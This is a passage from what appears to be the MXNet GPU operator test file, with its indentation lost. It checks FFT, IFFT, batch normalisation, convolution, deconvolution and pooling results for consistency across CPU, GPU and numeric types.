arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'ifft_data': shape, 'type_dict': {'ifft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train= True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
if len(shape) == 2:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[1]):
init_complex.real[:,i] = init[0][:,2*i]
init_complex.imag[:,i] = init[0][:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[1],rtol=1e-3, atol=1e-12)
if len(shape) == 4:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[3]):
init_complex.real[:,:,:,i] = init[0][:,:,:,2*i]
init_complex.imag[:,:,:,i] = init[0][:,:,:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[3],rtol=1e-3, atol=1e-12)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[1]):
temp[:,i] = exe.grad_arrays[0].asnumpy()[:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-12)
if len(shape) == 4:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[3]):
temp[:,:,:,i] = exe.grad_arrays[0].asnumpy()[:,:,:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-12)
@with_seed(0)
def test_ifft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_ifft(shape)
def check_fft(shape):
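    # contrib.fft emits interleaved [real, imag] output along the last axis; the test rebuilds that
    # layout from numpy.fft.fft for the forward check and uses numpy.fft.ifft for the gradient check.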
sym = mx.sym.contrib.fft(name='fft', compute_size = 128)
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
#forward
for exe in exe_list:
exe.forward(is_train=True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
out = np.fft.fft(init, n=None, axis=-1, norm=None)
if len(shape) == 2:
out = np.reshape(out,(out.shape[1],out.shape[2]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
p = 0
for i in range(out2.shape[1]//2):
a[:,p] = out2[:,i]
a[:,p+1] = out2[:,i+out2.shape[1]//2]
p = p+2
if len(shape) == 4:
out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
for i in range(out1[0].shape[0]):
for j in range(out1[0].shape[1]):
p = 0
for k in range(out2.shape[3]):
a[i,j,:,p] = out2[i,j,:,k]
a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k]
p = p+2
assert_almost_equal(a, out1[0],rtol=1e-3, atol=1e-6)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty((shape[0],2*shape[1]))
out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1]))
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[1]):
out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i]
out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[1],rtol=1e-3, atol=1e-8)
if len(shape) == 4:
out_grad = mx.nd.empty(out1[0].shape)
out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[3]):
out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i]
out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[3],rtol=1e-3, atol=1e-6)
@with_seed(0)
def test_fft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_fft(shape)
@with_seed()
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10087")
def test_batchnorm_with_type():
ctx_list_v1_2D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
]
ctx_list_v2_2D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_1D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_3D = [
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}}
]
# V1, 2D
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=False)
check_consistency(sym, ctx_list_v1_2D)
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=True)
check_consistency(sym, ctx_list_v1_2D)
# V2, 2D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
# V2, 1D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
#
# # V2, 3D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
@with_seed()
def test_batchnorm_versions():
def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
ctx_list = []
sym_list = []
# BatchNormV1 cpu
if 'batchnorm_v1_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNormV1 gpu (organic)
if 'batchnorm_v1_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm cpu
if 'batchnorm_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm gpu (organic)
if 'batchnorm_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=True))
# BatchNorm gpu cudnn (if cudnn is enabled)
if 'batchnorm_cudnn' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=False))
check_consistency(sym_list, ctx_list)
def test_1d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 20)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_2d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 10, 10)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_v1_cpu', 'batchnorm_v1_gpu',
'batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_3d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 3, 5, 5)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
test_1d_batchnorm(True, False)
test_1d_batchnorm(False, False)
test_1d_batchnorm(False, True)
test_1d_batchnorm(True, True)
test_2d_batchnorm(True, False)
test_2d_batchnorm(False, False)
test_2d_batchnorm(False, True)
test_2d_batchnorm(True, True)
test_3d_batchnorm(True, False)
test_3d_batchnorm(False, False)
test_3d_batchnorm(False, True)
test_3d_batchnorm(True, True)
@with_seed(1234)
@assert_raises_cudnn_disabled()
def test_convolution_with_type():
sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv')
data = mx.sym.Variable('conv_data')
w = mx.sym.Variable('conv_weight')
b = mx.sym.Variable('conv_bias')
w = mx.sym.transpose(w, axes=(0,2,3,1))
sym2 = mx.sym.transpose(data, axes=(0,2,3,1))
sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3))
sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv')
sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
# NHWC
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, tol=tol)
# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
# e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
# sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list), scale=0.5)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10141")
@with_seed()
def test_convolution_options():
# 1D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 3D convolution
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
def test_convolution_large_c():
problematic_c = 64 * 1024
# The convolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCW', num_filter=8, kernel=(2,), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCHW', num_filter=4, kernel=(2,2), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
def test_deconvolution_large_c():
problematic_c = 64 * 1024
# The deconvolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCW', num_filter=problematic_c, kernel=(2,), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCHW', num_filter=problematic_c, kernel=(2,2), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
@with_seed()
def test_convolution_versions():
# 2D convolution NCHW
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# 3D convolution NCDHW
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
syms = [conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
@with_seed()
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool')
check_consistency(sym, ctx_list)
@with_seed()
def test_deconvolution_with_type():
# Test basic deconvolution without exercising stride, pad or dilation.
# 1D deconvolution
sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
# 2D deconvolution
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
@with_seed()
def test_deconvolution_options():
# 1D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D deconvolution
